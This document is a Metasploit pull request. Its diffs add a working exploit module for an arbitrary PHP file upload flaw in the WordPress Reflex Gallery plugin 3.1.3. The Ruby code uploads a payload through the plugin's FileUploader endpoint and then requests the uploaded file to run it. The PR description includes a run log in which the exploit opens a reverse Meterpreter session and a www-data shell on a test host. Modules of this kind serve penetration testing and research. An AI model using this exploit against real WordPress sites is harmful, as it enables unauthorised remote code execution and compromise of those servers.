### PR TITLE
Add WordPress Reflex Gallery Plugin File Upload

### DIFF
--- a/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb
@@ -40,7 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def check
-    check_plugin_version_from_readme('reflex-gallery', '3.1.3')
+    check_plugin_version_from_readme('reflex-gallery', '3.1.4')
   end
 
   def exploit

--- a/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb
@@ -1,0 +1,84 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::HTTP::Wordpress
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Wordpress Reflex Gallery Upload Vulnerability',
+      'Description'    => %q{
+        This module exploits an arbitrary PHP code upload in the WordPress Reflex Gallery
+        version 3.1.3. The vulnerability allows for arbitrary file upload and remote code execution.
+      },
+      'Author'         =>
+        [
+          'TO DO', # Vulnerability discovery
+          'Roberto Soares Espreto <robertoespreto[at]gmail.com>'  # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['EDB', '00000'],
+          ['OSVDB', '000000'],
+          ['WPVDB', '0000']
+        ],
+      'Privileged'     => false,
+      'Platform'       => 'php',
+      'Arch'           => ARCH_PHP,
+      'Targets'        => [['Reflex Gallery 3.1.3', {}]],
+      'DisclosureDate' => 'Oct 22 2014',
+      'DefaultTarget'  => 0)
+    )
+  end
+
+  def check
+    check_plugin_version_from_readme('reflex-gallery', '3.1.3')
+  end
+
+  def exploit
+    php_pagename = rand_text_alpha(8 + rand(8)) + '.php'
+
+    data = Rex::MIME::Message.new
+    data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"qqfile\"; filename=\"#{php_pagename}\"")
+    post_data = data.to_s
+
+    time = Time.new
+    year = time.year.to_s
+    month = "%02d" % time.month
+
+    res = send_request_cgi({
+      'uri'       => normalize_uri(wordpress_url_plugins, 'reflex-gallery', 'admin', 'scripts', 'FileUploader', 'php.php'),
+      'method'    => 'POST',
+      'vars_get'  => {
+        'Year'    => "#{year}",
+        'Month'   => "#{month}"
+      },
+      'ctype'     => "multipart/form-data; boundary=#{data.bound}",
+      'data'      => post_data
+    })
+
+    if res
+      if res.code == 200 && res.body =~ /success|#{php_pagename}/
+        print_good("#{peer} - Our payload is at: #{php_pagename}. Calling payload...")
+        register_files_for_cleanup(php_pagename)
+      else
+        fail_with("#{peer} - Unable to deploy payload, server returned #{res.code}")
+      end
+    else
+      fail_with('ERROR')
+    end
+
+    print_status("#{peer} - Calling payload...")
+    send_request_cgi(
+      'uri'       => normalize_uri(wordpress_url_wp_content, 'uploads', "#{year}", "#{month}", php_pagename)
+    )
+  end
+end

--- a/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb
@@ -20,21 +20,21 @@ class Metasploit3 < Msf::Exploit::Remote
       },
       'Author'         =>
         [
-          'TO DO', # Vulnerability discovery
+          'Unknown', # Vulnerability discovery
           'Roberto Soares Espreto <robertoespreto[at]gmail.com>'  # Metasploit module
         ],
       'License'        => MSF_LICENSE,
       'References'     =>
         [
-          ['EDB', '00000'],
-          ['OSVDB', '000000'],
-          ['WPVDB', '0000']
+          ['EDB', '36374'],
+          ['OSVDB', '88853'],
+          ['WPVDB', '7867']
         ],
       'Privileged'     => false,
       'Platform'       => 'php',
       'Arch'           => ARCH_PHP,
       'Targets'        => [['Reflex Gallery 3.1.3', {}]],
-      'DisclosureDate' => 'Oct 22 2014',
+      'DisclosureDate' => 'Dec 30 2012', # OSVDB? EDB? WPVDB? Cannot set the date.
       'DefaultTarget'  => 0)
     )
   end

--- a/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb
@@ -70,10 +70,10 @@ class Metasploit3 < Msf::Exploit::Remote
         print_good("#{peer} - Our payload is at: #{php_pagename}. Calling payload...")
         register_files_for_cleanup(php_pagename)
       else
-        fail_with("#{peer} - Unable to deploy payload, server returned #{res.code}")
+        fail_with(Failure::Unknown, "#{peer} - Unable to deploy payload, server returned #{res.code}")
       end
     else
-      fail_with('ERROR')
+      fail_with(Failure::Unknown, 'Server did not respond in an expected way')
     end
 
     print_status("#{peer} - Calling payload...")


### PR DESCRIPTION
#### Add Wordpress Reflex Gallery Plugin File Upload Vulnerability.

  Application: Wordpress Plugin "Reflex Gallery" 3.1.3
  Homepage: https://wordpress.org/plugins/reflex-gallery/
  Source Code: https://downloads.wordpress.org/plugin/reflex-gallery.3.1.3.zip
  Active Installs (wordpress.org): 2,000+
#### Vulnerable packages*

  3.1.3
#### Usage:
##### Linux (Ubuntu 12.04.5 LTS):

```
msf > use exploit/unix/webapp/wp_reflexgallery_file_upload 
msf exploit(wp_reflexgallery_file_upload) > show options

Module options (exploit/unix/webapp/wp_reflexgallery_file_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                       yes       The target address
   RPORT      80               yes       The target port
   TARGETURI  /                yes       The base path to the wordpress application
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Reflex Gallery 3.1.3


msf exploit(wp_reflexgallery_file_upload) > info

       Name: Wordpress Reflex Gallery Upload Vulnerability
     Module: exploit/unix/webapp/wp_reflexgallery_file_upload
   Platform: PHP
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2012-12-30

Provided by:
  Unknown
  Roberto Soares Espreto <robertoespreto@gmail.com>

Available targets:
  Id  Name
  --  ----
  0   Reflex Gallery 3.1.3

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST                       yes       The target address
  RPORT      80               yes       The target port
  TARGETURI  /                yes       The base path to the wordpress application
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits an arbitrary PHP code upload in the WordPress 
  Reflex Gallery version 3.1.3. The vulnerability allows for arbitrary 
  file upload and remote code execution.

References:
  http://www.exploit-db.com/exploits/36374
  http://www.osvdb.org/88853
  https://wpvulndb.com/vulnerabilities/7867

msf exploit(wp_reflexgallery_file_upload) > set RHOST 192.168.0.15
RHOST => 192.168.0.15
msf exploit(wp_reflexgallery_file_upload) > exploit

[*] Started reverse handler on 192.168.0.14:4444 
[+] 192.168.0.15:80 - Our payload is at: GANZUbeMS.php. Calling payload...
[*] 192.168.0.15:80 - Calling payload...
[*] Sending stage (40499 bytes) to 192.168.0.15
[*] Meterpreter session 1 opened (192.168.0.14:4444 -> 192.168.0.15:36913) at 2015-04-16 08:50:13 -0300
[+] Deleted GANZUbeMS.php

meterpreter > sysinfo 
Computer    : msfdevel
OS          : Linux msfdevel 3.13.0-49-generic #81~precise1-Ubuntu SMP Wed Mar 25 16:32:40 UTC 2015 i686
Meterpreter : php/php
meterpreter > shell
Process 7177 created.
Channel 0 created.

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

```
